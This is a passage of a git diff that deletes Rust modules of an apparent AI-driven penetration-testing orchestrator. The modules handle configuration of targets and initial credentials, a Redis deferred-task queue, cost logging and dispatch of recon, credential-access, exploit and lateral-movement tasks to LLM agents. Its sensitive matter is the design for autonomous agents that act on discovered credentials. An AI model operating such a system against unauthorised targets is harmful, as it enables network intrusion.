.unwrap_or_default() - .split(',') - .map(|s| s.trim().to_string()) - .filter(|s| !s.is_empty()) - .collect(); - (raw_op, domain, ips, None) - }; - - // Initial credential: JSON payload takes precedence, then env var. - // Format: user:pass@domain - let initial_credential = json_cred.or_else(|| { - env::var("ARES_INITIAL_CREDENTIAL") - .ok() - .and_then(|raw| parse_credential_spec(&raw, &target_domain)) - }); - - let max_concurrent_tasks = parse_env("ARES_MAX_CONCURRENT_TASKS", 8); - let heartbeat_interval_secs = parse_env("ARES_HEARTBEAT_INTERVAL_SECS", 30); - let heartbeat_timeout_secs = parse_env("ARES_HEARTBEAT_TIMEOUT_SECS", 120); - let result_poll_interval_ms = parse_env("ARES_RESULT_POLL_INTERVAL_MS", 500); - let lock_ttl_secs = parse_env("ARES_LOCK_TTL_SECS", 300); - let deferred_poll_interval_secs = parse_env("ARES_DEFERRED_POLL_INTERVAL_SECS", 10); - let max_tasks_per_role = parse_env("ARES_MAX_TASKS_PER_ROLE", 3); - let dispatch_delay_ms = parse_env("ARES_DISPATCH_DELAY_MS", 200); - let stale_task_timeout_secs = parse_env("ARES_STALE_TASK_TIMEOUT_SECS", 900); - let deferred_task_max_age_secs = parse_env("ARES_DEFERRED_TASK_MAX_AGE_SECS", 300); - let max_deferred_per_type = parse_env("ARES_MAX_DEFERRED_PER_TYPE", 50); - let max_deferred_total = parse_env("ARES_MAX_DEFERRED_TOTAL", 200); - - Ok(Self { - redis_url, - operation_id, - max_concurrent_tasks, - heartbeat_interval: Duration::from_secs(heartbeat_interval_secs), - heartbeat_timeout: Duration::from_secs(heartbeat_timeout_secs), - result_poll_interval: Duration::from_millis(result_poll_interval_ms), - lock_ttl: Duration::from_secs(lock_ttl_secs), - deferred_poll_interval: Duration::from_secs(deferred_poll_interval_secs), - max_tasks_per_role, - dispatch_delay: Duration::from_millis(dispatch_delay_ms), - stale_task_timeout: Duration::from_secs(stale_task_timeout_secs), - deferred_task_max_age: Duration::from_secs(deferred_task_max_age_secs), - max_deferred_per_type, - max_deferred_total, - target_domain, - target_ips, - initial_credential, - }) - } - - /// Hard cap = 1.5x the soft concurrency limit. Tasks above this are deferred. - pub fn hard_cap(&self) -> usize { - (self.max_concurrent_tasks as f64 * 1.5) as usize - } -} - -/// Parse a credential spec in `user:pass@domain` format. 
-/// If no `@domain` is given, falls back to `default_domain`.
-///
-/// The `@` that separates password from domain must look like a domain
-/// (contains a dot). This avoids misinterpreting `@` characters within
-/// passwords (e.g., `admin:P@ssw0rd` stays intact).
-fn parse_credential_spec(spec: &str, default_domain: &str) -> Option<InitialCredential> {
-    let colon_pos = spec.find(':')?;
-    let username = &spec[..colon_pos];
-    let rest = &spec[colon_pos + 1..]; // password[@domain]
-
-    // Only treat text after the last '@' as a domain if it contains a dot,
-    // to avoid misinterpreting '@' in passwords (e.g. P@ssw0rd).
-    let (password, domain) = if let Some(at_pos) = rest.rfind('@') {
-        let candidate = &rest[at_pos + 1..];
-        if candidate.contains('.') {
-            (&rest[..at_pos], candidate)
-        } else {
-            (rest, default_domain)
-        }
-    } else {
-        (rest, default_domain)
-    };
-
-    if username.is_empty() || password.is_empty() {
-        return None;
-    }
-    Some(InitialCredential {
-        username: username.to_string(),
-        password: password.to_string(),
-        domain: domain.to_string(),
-    })
-}
-
-/// Parse an environment variable into a numeric type, falling back to `default`.
-fn parse_env<T: std::str::FromStr>(key: &str, default: T) -> T {
-    env::var(key)
-        .ok()
-        .and_then(|v| v.parse().ok())
-        .unwrap_or(default)
-}
-
-#[cfg(test)]
-mod tests {
-    use super::*;
-
-    /// Helper to create a config without env vars.
-    pub(crate) fn make_config(max_tasks: usize) -> OrchestratorConfig {
-        OrchestratorConfig {
-            redis_url: "redis://localhost".into(),
-            operation_id: "test-op".into(),
-            max_concurrent_tasks: max_tasks,
-            heartbeat_interval: Duration::from_secs(30),
-            heartbeat_timeout: Duration::from_secs(120),
-            result_poll_interval: Duration::from_millis(500),
-            lock_ttl: Duration::from_secs(300),
-            deferred_poll_interval: Duration::from_secs(10),
-            max_tasks_per_role: 3,
-            dispatch_delay: Duration::from_millis(0),
-            stale_task_timeout: Duration::from_secs(900),
-            deferred_task_max_age: Duration::from_secs(300),
-            max_deferred_per_type: 50,
-            max_deferred_total: 200,
-            target_domain: String::new(),
-            target_ips: Vec::new(),
-            initial_credential: None,
-        }
-    }
-
-    #[test]
-    fn hard_cap_is_1_5x() {
-        assert_eq!(make_config(8).hard_cap(), 12);
-        assert_eq!(make_config(10).hard_cap(), 15);
-        assert_eq!(make_config(1).hard_cap(), 1);
-    }
-
-    #[test]
-    fn from_env_plain_and_json_and_missing() {
-        // Single test to avoid env var race conditions between parallel tests.
- std::env::remove_var("ARES_INITIAL_CREDENTIAL"); - - // Missing → error - std::env::remove_var("ARES_OPERATION_ID"); - assert!(OrchestratorConfig::from_env().is_err()); - - // Plain string → operation_id, empty targets - std::env::set_var("ARES_OPERATION_ID", "test-op-1"); - let c = OrchestratorConfig::from_env().unwrap(); - assert_eq!(c.operation_id, "test-op-1"); - assert_eq!(c.max_concurrent_tasks, 8); - assert_eq!(c.heartbeat_interval, Duration::from_secs(30)); - assert!(c.target_ips.is_empty()); - assert!(c.initial_credential.is_none()); - - // JSON payload → parsed operation_id, target_domain, target_ips - let payload = r#"{"operation_id":"op-json-test","target_domain":"contoso.local","target_ips":["192.168.58.1","192.168.58.2"],"model":"gpt-4"}"#; - std::env::set_var("ARES_OPERATION_ID", payload); - let c = OrchestratorConfig::from_env().unwrap(); - assert_eq!(c.operation_id, "op-json-test"); - assert_eq!(c.target_domain, "contoso.local"); - assert_eq!(c.target_ips, vec!["192.168.58.1", "192.168.58.2"]); - - // JSON payload with nested initial_credential (Python format) - let payload = r#"{"operation_id":"op-cred","target_domain":"contoso.local","target_ips":[],"initial_credential":{"username":"admin","password":"Pass123","domain":"contoso.local"}}"#; - std::env::set_var("ARES_OPERATION_ID", payload); - let c = OrchestratorConfig::from_env().unwrap(); - let cred = c.initial_credential.unwrap(); - assert_eq!(cred.username, "admin"); - assert_eq!(cred.password, "Pass123"); - assert_eq!(cred.domain, "contoso.local"); - - // JSON payload with flat initial credential (backwards compat) - let payload = r#"{"operation_id":"op-cred2","target_domain":"contoso.local","target_ips":[],"initial_username":"admin2","initial_password":"Pass456"}"#; - std::env::set_var("ARES_OPERATION_ID", payload); - let c = OrchestratorConfig::from_env().unwrap(); - let cred = c.initial_credential.unwrap(); - assert_eq!(cred.username, "admin2"); - assert_eq!(cred.password, "Pass456"); - assert_eq!(cred.domain, "contoso.local"); - - // Env var credential (ARES_INITIAL_CREDENTIAL) - std::env::set_var("ARES_OPERATION_ID", "test-op-2"); - std::env::set_var("ARES_INITIAL_CREDENTIAL", "user1:secret@fabrikam.local"); - let c = OrchestratorConfig::from_env().unwrap(); - let cred = c.initial_credential.unwrap(); - assert_eq!(cred.username, "user1"); - assert_eq!(cred.password, "secret"); - assert_eq!(cred.domain, "fabrikam.local"); - - std::env::remove_var("ARES_OPERATION_ID"); - std::env::remove_var("ARES_INITIAL_CREDENTIAL"); - } - - #[test] - fn parse_credential_spec_full() { - let cred = parse_credential_spec("admin:P@ssw0rd@contoso.local", "").unwrap(); - assert_eq!(cred.username, "admin"); - assert_eq!(cred.password, "P@ssw0rd"); - assert_eq!(cred.domain, "contoso.local"); - } - - #[test] - fn parse_credential_spec_no_domain() { - let cred = parse_credential_spec("admin:P@ssw0rd", "fallback.local").unwrap(); - assert_eq!(cred.username, "admin"); - assert_eq!(cred.password, "P@ssw0rd"); - assert_eq!(cred.domain, "fallback.local"); - } - - #[test] - fn parse_credential_spec_at_in_password() { - // rfind('@') splits at the last @, so user:p@ss@domain works - let cred = parse_credential_spec("admin:p@ss@contoso.local", "").unwrap(); - assert_eq!(cred.username, "admin"); - assert_eq!(cred.password, "p@ss"); - assert_eq!(cred.domain, "contoso.local"); - } - - #[test] - fn parse_credential_spec_invalid() { - // No colon - assert!(parse_credential_spec("admin", "").is_none()); - // Empty username - 
assert!(parse_credential_spec(":pass@contoso.local", "").is_none()); - // Empty password - assert!(parse_credential_spec("admin:@contoso.local", "").is_none()); - // Empty password without domain - assert!(parse_credential_spec("admin:", "").is_none()); - } -} diff --git a/ares-orchestrator/src/cost_summary.rs b/ares-orchestrator/src/cost_summary.rs deleted file mode 100644 index 893c150e..00000000 --- a/ares-orchestrator/src/cost_summary.rs +++ /dev/null @@ -1,87 +0,0 @@ -//! Periodic token usage and cost summary. -//! -//! Spawns a background task that logs aggregate token usage and estimated cost -//! every 120 seconds, matching Python's `_periodic_token_usage_summary()`. - -use std::sync::Arc; -use std::time::Duration; - -use tokio::sync::watch; -use tokio::task::JoinHandle; -use tracing::{debug, info}; - -use ares_core::token_usage::{estimate_usage_cost, get_token_usage}; - -use crate::config::OrchestratorConfig; -use crate::task_queue::TaskQueue; - -/// How often to log the cost summary. -const SUMMARY_INTERVAL: Duration = Duration::from_secs(120); - -/// Spawn the periodic cost summary background task. -pub fn spawn_cost_summary( - queue: TaskQueue, - config: Arc, - shutdown_rx: watch::Receiver, -) -> JoinHandle<()> { - tokio::spawn(cost_summary_loop(queue, config, shutdown_rx)) -} - -async fn cost_summary_loop( - queue: TaskQueue, - config: Arc, - mut shutdown_rx: watch::Receiver, -) { - let mut interval = tokio::time::interval(SUMMARY_INTERVAL); - interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); - - // Skip the first immediate tick - interval.tick().await; - - loop { - tokio::select! { - _ = interval.tick() => {} - _ = shutdown_rx.changed() => { - debug!("Cost summary: shutdown"); - return; - } - } - - if *shutdown_rx.borrow() { - return; - } - - let mut conn = queue.connection(); - match get_token_usage(&mut conn, &config.operation_id).await { - Ok(Some(usage)) => { - let in_tok = usage.input_tokens; - let out_tok = usage.output_tokens; - if in_tok == 0 && out_tok == 0 { - continue; - } - let total = in_tok + out_tok; - - let (total_cost, breakdown, _unpriced) = estimate_usage_cost(&usage); - - let cost_str = match total_cost { - Some(cost) => { - let suffix = if breakdown.len() > 1 { " blended" } else { "" }; - format!(" | ${cost:.4}{suffix}") - } - None if !usage.models.is_empty() => { - let n = usage.models.len(); - let label = if n > 1 { "models" } else { "model" }; - format!(" | cost unavailable for {n} {label}") - } - _ => String::new(), - }; - - info!("💰 [token-usage] {total} tokens (in: {in_tok} out: {out_tok}){cost_str}"); - } - Ok(None) => {} - Err(e) => { - debug!("Token usage summary failed: {e}"); - } - } - } -} diff --git a/ares-orchestrator/src/deferred.rs b/ares-orchestrator/src/deferred.rs deleted file mode 100644 index ab0d4389..00000000 --- a/ares-orchestrator/src/deferred.rs +++ /dev/null @@ -1,393 +0,0 @@ -//! Redis-backed deferred task queue. -//! -//! When the throttler decides to defer a task, it lands here in a ZSET keyed -//! by `ares:deferred:{operation_id}:{task_type}`. A background tokio task -//! periodically checks for tasks whose score (priority-weighted timestamp) -//! qualifies them for re-dispatch once concurrency slots open up. -//! -//! Score formula: `(priority * 1_000_000_000) + (unix_millis)` -//! Lower score = higher priority = processed first. 
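A standalone sketch of that formula (timestamps hypothetical; lower score pops first):

fn deferred_score(priority: i32, enqueue_time_secs: f64) -> f64 {
    // Priority bucket dominates; enqueue time (converted to millis) breaks
    // ties FIFO within a bucket.
    (priority as f64) * 1_000_000_000.0 + enqueue_time_secs * 1000.0
}

fn main() {
    let urgent = deferred_score(1, 1_700_000_010.0);  // higher priority, enqueued later
    let routine = deferred_score(5, 1_700_000_000.0); // lower priority, enqueued earlier
    assert!(urgent < routine); // the urgent task is still popped first
}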
- -use anyhow::{Context, Result}; -use chrono::Utc; -use redis::AsyncCommands; -use serde::{Deserialize, Serialize}; -use std::sync::Arc; -use tokio::sync::watch; -use tracing::{debug, info, warn}; - -use crate::config::OrchestratorConfig; -use crate::dispatcher::Dispatcher; -use crate::task_queue::TaskQueue; -use crate::throttling::{ThrottleDecision, Throttler}; - -/// Redis key prefix for deferred queues (matches Python `DEFERRED_QUEUE_PREFIX`). -pub const DEFERRED_QUEUE_PREFIX: &str = "ares:deferred"; - -#[derive(Debug, Clone, Serialize, Deserialize)] -pub struct DeferredTask { - pub priority: i32, - pub enqueue_time: f64, - pub task_type: String, - pub target_role: String, - pub payload: serde_json::Value, - pub source_agent: String, -} - -impl DeferredTask { - /// ZSET score: priority bucket * 1e9 + enqueue millis. - pub fn score(&self) -> f64 { - (self.priority as f64) * 1_000_000_000.0 + self.enqueue_time * 1000.0 - } -} - -/// Manages the Redis ZSET-backed deferred queue. -pub struct DeferredQueue { - queue: TaskQueue, - config: Arc, -} - -impl DeferredQueue { - pub fn new(queue: TaskQueue, config: Arc) -> Self { - Self { queue, config } - } - - /// Redis key for the per-task-type deferred ZSET. - fn zset_key(&self, task_type: &str) -> String { - format!( - "{}:{}:{}", - DEFERRED_QUEUE_PREFIX, self.config.operation_id, task_type - ) - } - - /// Enqueue a task for later dispatch. - /// - /// Returns `true` if the task was accepted, `false` if the queue is full. - pub async fn enqueue(&self, task: &DeferredTask) -> Result { - let key = self.zset_key(&task.task_type); - - // Check per-type limit - let mut conn = self.queue_conn(); - let current_len: usize = conn.zcard(&key).await.unwrap_or(0); - if current_len >= self.config.max_deferred_per_type { - debug!( - task_type = %task.task_type, - len = current_len, - max = self.config.max_deferred_per_type, - "Deferred queue full for type" - ); - return Ok(false); - } - - let json = serde_json::to_string(task).context("Failed to serialize DeferredTask")?; - let score = task.score(); - - conn.zadd::<_, _, _, ()>(&key, &json, score) - .await - .with_context(|| format!("ZADD to {key}"))?; - - info!( - task_type = %task.task_type, - role = %task.target_role, - priority = task.priority, - score, - "Task deferred" - ); - Ok(true) - } - - /// Pop the highest-priority (lowest-score) task from any type ZSET. - /// - /// Scans all known task-type keys for this operation and picks the - /// globally lowest score. 
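For a single known key, the peek-plus-ZREM sequence in the method below could collapse into one atomic command; a sketch of that variant, assuming the `redis` crate's async API (helper name hypothetical). The real code cannot use this directly because deferred tasks are spread across per-type ZSETs, so it has to peek every key before removing the global winner:

use redis::aio::ConnectionManager;

// Hypothetical single-key variant: ZPOPMIN removes and returns the
// lowest-score member atomically, so no separate ZREM is needed.
async fn pop_one(conn: &mut ConnectionManager, key: &str) -> Option<String> {
    let popped: Vec<(String, f64)> = redis::cmd("ZPOPMIN")
        .arg(key)
        .arg(1)
        .query_async(conn)
        .await
        .ok()?;
    popped.into_iter().next().map(|(member, _score)| member)
}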
- pub async fn pop_best(&self) -> Result> { - let pattern = format!("{}:{}:*", DEFERRED_QUEUE_PREFIX, self.config.operation_id); - let mut conn = self.queue_conn(); - - // SCAN for matching keys (avoids blocking Redis with KEYS) - let keys: Vec = scan_keys_async(&mut conn, &pattern).await; - - if keys.is_empty() { - return Ok(None); - } - - // Find the globally best candidate across all type ZSETs - let mut best: Option<(String, String, f64)> = None; // (key, member, score) - - for key in &keys { - // Peek at the lowest-score member - let members: Vec<(String, f64)> = redis::cmd("ZRANGEBYSCORE") - .arg(key) - .arg("-inf") - .arg("+inf") - .arg("WITHSCORES") - .arg("LIMIT") - .arg(0) - .arg(1) - .query_async(&mut conn) - .await - .unwrap_or_default(); - - if let Some((member, score)) = members.into_iter().next() { - let dominated = best.as_ref().map(|(_, _, s)| score < *s).unwrap_or(true); - if dominated { - best = Some((key.clone(), member, score)); - } - } - } - - match best { - Some((key, member, _score)) => { - // Atomically remove it - let removed: usize = conn.zrem(&key, &member).await.unwrap_or(0); - if removed == 0 { - // Someone else grabbed it (unlikely in single-orchestrator mode) - return Ok(None); - } - let task: DeferredTask = - serde_json::from_str(&member).context("Bad DeferredTask JSON")?; - Ok(Some(task)) - } - None => Ok(None), - } - } - - /// Evict tasks older than `max_age` from all deferred ZSETs. - pub async fn evict_stale(&self) -> Result { - let pattern = format!("{}:{}:*", DEFERRED_QUEUE_PREFIX, self.config.operation_id); - let mut conn = self.queue_conn(); - let keys: Vec = scan_keys_async(&mut conn, &pattern).await; - - let max_age = self.config.deferred_task_max_age; - let cutoff = Utc::now().timestamp() as f64 - max_age.as_secs_f64(); - let mut total_evicted = 0_usize; - - for key in &keys { - // All members, check enqueue_time - let members: Vec<(String, f64)> = redis::cmd("ZRANGEBYSCORE") - .arg(key) - .arg("-inf") - .arg("+inf") - .arg("WITHSCORES") - .query_async(&mut conn) - .await - .unwrap_or_default(); - - for (member, _score) in members { - if let Ok(task) = serde_json::from_str::(&member) { - if task.enqueue_time < cutoff { - let _: usize = conn.zrem(key, &member).await.unwrap_or(0); - total_evicted += 1; - debug!( - task_type = %task.task_type, - age_secs = Utc::now().timestamp() as f64 - task.enqueue_time, - "Evicted stale deferred task" - ); - } - } - } - } - - if total_evicted > 0 { - info!(evicted = total_evicted, "Deferred queue stale eviction"); - } - Ok(total_evicted) - } - - fn queue_conn(&self) -> redis::aio::ConnectionManager { - // TaskQueue wraps a ConnectionManager which implements Clone cheaply - // We access it through an internal method. - self.queue.connection() - } -} - -/// Scan Redis keys matching a pattern using cursor iteration (avoids KEYS). -async fn scan_keys_async(conn: &mut redis::aio::ConnectionManager, pattern: &str) -> Vec { - let mut all_keys = Vec::new(); - let mut cursor: u64 = 0; - loop { - let result: Result<(u64, Vec), _> = redis::cmd("SCAN") - .arg(cursor) - .arg("MATCH") - .arg(pattern) - .arg("COUNT") - .arg(100) - .query_async(conn) - .await; - match result { - Ok((next_cursor, keys)) => { - all_keys.extend(keys); - cursor = next_cursor; - if cursor == 0 { - break; - } - } - Err(_) => break, - } - } - all_keys -} - -/// Spawn a tokio task that periodically drains the deferred queue whenever -/// the throttler allows new submissions. 
-/// -/// Uses `Dispatcher::do_submit()` to route tasks directly to the LLM agent -/// loop (not Redis task queues, which have no consumer in this process). -pub fn spawn_deferred_processor( - deferred: Arc, - dispatcher: Arc, - throttler: Arc, - config: Arc, - mut shutdown: watch::Receiver, -) -> tokio::task::JoinHandle<()> { - tokio::spawn(async move { - let mut interval = tokio::time::interval(config.deferred_poll_interval); - - loop { - tokio::select! { - _ = interval.tick() => {}, - _ = shutdown.changed() => { - info!("Deferred processor shutting down"); - break; - } - } - - // Evict stale tasks first - if let Err(e) = deferred.evict_stale().await { - warn!(err = %e, "Deferred eviction error"); - } - - // Try to drain as many as possible while slots are open - let mut dispatched = 0_u32; - loop { - let Some(task) = (match deferred.pop_best().await { - Ok(t) => t, - Err(e) => { - warn!(err = %e, "pop_best error"); - break; - } - }) else { - break; // queue empty - }; - - // Re-check throttle before submitting - let decision = throttler - .check(&task.task_type, &task.target_role, Some(&task.payload)) - .await; - - match decision { - ThrottleDecision::Allow => { - // Pre-check credential concurrency to avoid a hot - // re-enqueue loop: submit_to_llm would re-defer the - // task if the credential is at capacity, but this - // drain loop would immediately pop it again. - if let Some(cred_key) = - crate::dispatcher::credential_key_from_payload(&task.payload) - { - if !dispatcher.credential_inflight.can_acquire(&cred_key).await { - let _ = deferred.enqueue(&task).await; - break; - } - } - - // Route directly to the LLM agent loop via Dispatcher. - // do_submit handles tracker.add() and throttler.record_dispatch(). - match dispatcher - .do_submit( - &task.task_type, - &task.target_role, - task.payload.clone(), - task.priority, - ) - .await - { - Ok(Some(tid)) => { - dispatched += 1; - info!( - task_id = %tid, - task_type = %task.task_type, - "Deferred task dispatched" - ); - } - Ok(None) => { - // Credential concurrency block or no role mapping. - // Task may have been re-enqueued by submit_to_llm; - // break to avoid hot loop. - break; - } - Err(e) => { - warn!(err = %e, "Failed to dispatch deferred task"); - // Re-enqueue so it is not lost - let _ = deferred.enqueue(&task).await; - break; - } - } - } - ThrottleDecision::Defer | ThrottleDecision::Wait(_) => { - // Put it back; stop draining since capacity is full. 
-                        let _ = deferred.enqueue(&task).await;
-                        break;
-                    }
-                }
-            }
-
-            if dispatched > 0 {
-                info!(dispatched, "Deferred queue drain cycle");
-            }
-        }
-    })
-}
-
-#[cfg(test)]
-mod tests {
-    use super::*;
-
-    fn make_task(priority: i32, enqueue_time: f64) -> DeferredTask {
-        DeferredTask {
-            priority,
-            enqueue_time,
-            task_type: "recon".into(),
-            target_role: "recon".into(),
-            payload: serde_json::json!({}),
-            source_agent: "orchestrator".into(),
-        }
-    }
-
-    #[test]
-    fn higher_priority_lower_score() {
-        let high = make_task(1, 1000.0);
-        let low = make_task(5, 1000.0);
-        assert!(high.score() < low.score());
-    }
-
-    #[test]
-    fn same_priority_fifo_ordering() {
-        let earlier = make_task(5, 1000.0);
-        let later = make_task(5, 1010.0);
-        assert!(earlier.score() < later.score());
-    }
-
-    #[test]
-    fn score_deterministic() {
-        let t = make_task(3, 1700000000.0);
-        assert_eq!(t.score(), t.score());
-    }
-
-    #[test]
-    fn priority_dominates_time_within_bucket() {
-        // With small time deltas (< 1s apart), priority bucket dominates
-        let p1_late = make_task(1, 100.010);
-        let p5_early = make_task(5, 100.000);
-        assert!(p1_late.score() < p5_early.score());
-    }
-
-    #[test]
-    fn deferred_task_roundtrip() {
-        let t = make_task(3, 1700000000.0);
-        let json = serde_json::to_string(&t).unwrap();
-        let t2: DeferredTask = serde_json::from_str(&json).unwrap();
-        assert_eq!(t.priority, t2.priority);
-        assert_eq!(t.task_type, t2.task_type);
-        assert!((t.enqueue_time - t2.enqueue_time).abs() < f64::EPSILON);
-    }
-}
diff --git a/ares-orchestrator/src/dispatcher/mod.rs b/ares-orchestrator/src/dispatcher/mod.rs
deleted file mode 100644
index 59901e70..00000000
--- a/ares-orchestrator/src/dispatcher/mod.rs
+++ /dev/null
@@ -1,132 +0,0 @@
-//! Central dispatcher — ties together task submission, throttling, and state.
-//!
-//! All task submission goes through `Dispatcher::throttled_submit()` which checks
-//! the throttler, submits or defers, and tracks active tasks. Convenience methods
-//! like `request_crack()`, `request_recon()` etc. build the correct payloads.
-
-mod submission;
-mod task_builders;
-
-use std::collections::HashMap;
-use std::sync::Arc;
-use tokio::sync::{Mutex, Notify};
-
-use crate::config::OrchestratorConfig;
-use crate::deferred::DeferredQueue;
-use crate::llm_runner::LlmTaskRunner;
-use crate::routing::ActiveTaskTracker;
-use crate::state::SharedState;
-use crate::task_queue::TaskQueue;
-use crate::throttling::Throttler;
-
-// ---------------------------------------------------------------------------
-// Per-credential in-flight limiter
-// ---------------------------------------------------------------------------
-
-/// Limits how many concurrent LLM agent loops may be in-flight for the same
-/// credential. Prevents thundering-herd when only one credential has been
-/// discovered and both automation loops try to spawn many tasks with it.
-#[derive(Clone)]
-pub struct CredentialInflight {
-    inner: Arc<Mutex<HashMap<String, usize>>>,
-    max_per_credential: usize,
-}
-
-impl CredentialInflight {
-    pub fn new(max_per_credential: usize) -> Self {
-        Self {
-            inner: Arc::new(Mutex::new(HashMap::new())),
-            max_per_credential,
-        }
-    }
-
-    /// Try to acquire a slot. Returns `true` if under the limit.
-    pub async fn try_acquire(&self, key: &str) -> bool {
-        let mut map = self.inner.lock().await;
-        let count = map.entry(key.to_string()).or_insert(0);
-        if *count < self.max_per_credential {
-            *count += 1;
-            true
-        } else {
-            false
-        }
-    }
-
-    /// Check if a slot is available WITHOUT acquiring it.
- pub async fn can_acquire(&self, key: &str) -> bool { - let map = self.inner.lock().await; - match map.get(key) { - Some(count) => *count < self.max_per_credential, - None => true, - } - } - - /// Release a slot when the task completes (success or failure). - pub async fn release(&self, key: &str) { - let mut map = self.inner.lock().await; - if let Some(count) = map.get_mut(key) { - *count = count.saturating_sub(1); - if *count == 0 { - map.remove(key); - } - } - } -} - -/// Extract `"user@domain"` from a task payload's `credential` field. -pub fn credential_key_from_payload(payload: &serde_json::Value) -> Option { - let cred = payload.get("credential")?; - let username = cred.get("username").and_then(|v| v.as_str())?; - let domain = cred.get("domain").and_then(|v| v.as_str()).unwrap_or(""); - Some(format!("{}@{}", username, domain)) -} - -/// Central dispatcher for submitting tasks with throttling and routing. -pub struct Dispatcher { - pub queue: TaskQueue, - pub tracker: ActiveTaskTracker, - pub throttler: Arc, - pub deferred: Arc, - pub state: SharedState, - pub config: Arc, - /// YAML config (agent roles, vulnerability priorities, context management). - /// `None` if no YAML config file was found at startup. - pub ares_config: Option>, - /// Notifies auto_credential_access to wake up when new creds arrive. - pub credential_access_notify: Arc, - /// Notifies auto_delegation_enumeration to wake up when new creds arrive. - pub delegation_notify: Arc, - /// LLM runner — drives tasks through the Rust agent loop. - pub llm_runner: Arc, - /// Per-credential concurrency limiter. - pub credential_inflight: CredentialInflight, -} - -impl Dispatcher { - #[allow(clippy::too_many_arguments)] - pub fn new( - queue: TaskQueue, - tracker: ActiveTaskTracker, - throttler: Arc, - deferred: Arc, - state: SharedState, - config: Arc, - ares_config: Option>, - llm_runner: Arc, - ) -> Self { - Self { - queue, - tracker, - throttler, - deferred, - state, - config, - ares_config, - credential_access_notify: Arc::new(Notify::new()), - delegation_notify: Arc::new(Notify::new()), - llm_runner, - // Allow up to 3 concurrent tasks per credential - credential_inflight: CredentialInflight::new(3), - } - } -} diff --git a/ares-orchestrator/src/dispatcher/submission.rs b/ares-orchestrator/src/dispatcher/submission.rs deleted file mode 100644 index a102c71c..00000000 --- a/ares-orchestrator/src/dispatcher/submission.rs +++ /dev/null @@ -1,450 +0,0 @@ -//! Task submission — throttled_submit and do_submit. - -use std::collections::HashMap; -use std::sync::Arc; - -use anyhow::Result; -use chrono::Utc; -use serde_json::{json, Value}; -use tracing::{debug, info, warn}; - -use crate::deferred::DeferredTask; -use crate::llm_runner::LlmTaskRunner; -use crate::routing::ActiveTask; -use crate::task_queue::TaskResult; -use crate::throttling::ThrottleDecision; - -use ares_llm::LoopEndReason; - -use super::Dispatcher; - -impl Dispatcher { - /// Submit a task with throttle checking. Returns the task_id if submitted, - /// None if deferred or rejected. 
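Before the submission paths that follow, a minimal usage sketch of the `CredentialInflight` limiter defined above, assuming a limit of 1 so the second acquire is refused (key names illustrative):

#[tokio::main]
async fn main() {
    let limiter = CredentialInflight::new(1);
    assert!(limiter.try_acquire("alice@contoso.local").await);  // slot taken
    assert!(!limiter.try_acquire("alice@contoso.local").await); // at capacity
    assert!(limiter.can_acquire("bob@contoso.local").await);    // unrelated key is free
    limiter.release("alice@contoso.local").await;
    assert!(limiter.try_acquire("alice@contoso.local").await);  // slot reusable after release
}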
- pub async fn throttled_submit( - &self, - task_type: &str, - target_role: &str, - payload: serde_json::Value, - priority: i32, - ) -> Result> { - let decision = self - .throttler - .check(task_type, target_role, Some(&payload)) - .await; - - match decision { - ThrottleDecision::Allow => { - self.do_submit(task_type, target_role, payload, priority) - .await - } - ThrottleDecision::Defer => { - let task = DeferredTask { - priority, - enqueue_time: Utc::now().timestamp() as f64, - task_type: task_type.to_string(), - target_role: target_role.to_string(), - payload, - source_agent: "orchestrator".to_string(), - }; - match self.deferred.enqueue(&task).await { - Ok(true) => { - debug!(task_type, target_role, "Task deferred"); - Ok(None) - } - Ok(false) => { - debug!(task_type, target_role, "Deferred queue full, task dropped"); - Ok(None) - } - Err(e) => { - warn!(err = %e, "Failed to defer task, attempting direct submit"); - self.do_submit(task_type, target_role, task.payload, priority) - .await - } - } - } - ThrottleDecision::Wait(dur) => { - // Sleep and retry once - tokio::time::sleep(dur).await; - let retry_decision = self - .throttler - .check(task_type, target_role, Some(&payload)) - .await; - match retry_decision { - ThrottleDecision::Allow => { - self.do_submit(task_type, target_role, payload, priority) - .await - } - _ => { - let task = DeferredTask { - priority, - enqueue_time: Utc::now().timestamp() as f64, - task_type: task_type.to_string(), - target_role: target_role.to_string(), - payload, - source_agent: "orchestrator".to_string(), - }; - let _ = self.deferred.enqueue(&task).await; - Ok(None) - } - } - } - } - } - - /// Direct submit (bypasses throttle). Returns task_id. - /// - /// Routes the task to the Rust LLM agent loop. Prefers `target_role` - /// when it maps to a valid AgentRole (e.g. MSSQL exploit → lateral), - /// falling back to `role_for_task_type` for the default mapping. - pub async fn do_submit( - &self, - task_type: &str, - target_role: &str, - payload: serde_json::Value, - _priority: i32, - ) -> Result> { - // Prefer the caller-specified target_role (from recommended_agent) - // over the static task_type → role mapping. This lets automation - // modules like MSSQL route exploits to lateral instead of privesc. - let role = ares_llm::tool_registry::AgentRole::parse(target_role) - .or_else(|| crate::llm_runner::role_for_task_type(task_type)); - - let role = match role { - Some(r) => r, - None => { - warn!( - task_type = task_type, - target_role = target_role, - "No LLM role mapping for task type or target role, dropping" - ); - return Ok(None); - } - }; - - self.submit_to_llm( - self.llm_runner.clone(), - task_type, - target_role, - role, - payload, - ) - .await - } - - /// Submit a task to the Rust LLM agent loop. Spawns a background tokio - /// task and pushes the result back through the normal result queue so it - /// flows through `process_completed_task()`. - async fn submit_to_llm( - &self, - runner: Arc, - task_type: &str, - target_role: &str, - role: ares_llm::tool_registry::AgentRole, - payload: serde_json::Value, - ) -> Result> { - // Per-credential concurrency gate: if too many tasks are already - // in-flight for this credential, defer instead of spawning another. 
- let cred_key = super::credential_key_from_payload(&payload); - if let Some(ref key) = cred_key { - if !self.credential_inflight.try_acquire(key).await { - info!( - credential = key.as_str(), - task_type, "Credential concurrency limit reached, deferring task" - ); - let task = DeferredTask { - priority: 3, - enqueue_time: Utc::now().timestamp() as f64, - task_type: task_type.to_string(), - target_role: target_role.to_string(), - payload, - source_agent: "orchestrator".to_string(), - }; - let _ = self.deferred.enqueue(&task).await; - return Ok(None); - } - } - - let task_id = format!( - "{}_{}", - task_type, - &uuid::Uuid::new_v4().simple().to_string()[..12] - ); - - info!( - task_id = %task_id, - task_type = task_type, - role = target_role, - "Routing task to LLM runner (Rust agent loop)" - ); - - self.tracker - .add(ActiveTask { - task_id: task_id.clone(), - task_type: task_type.to_string(), - role: target_role.to_string(), - submitted_at: std::time::Instant::now(), - }) - .await; - - self.throttler.record_dispatch().await; - - // Set initial task status with full metadata - let _ = self - .queue - .set_task_status_full( - &task_id, - "in_progress", - &self.config.operation_id, - target_role, - task_type, - Some(&payload), - ) - .await; - - // Persist pending task to Redis HASH for recovery 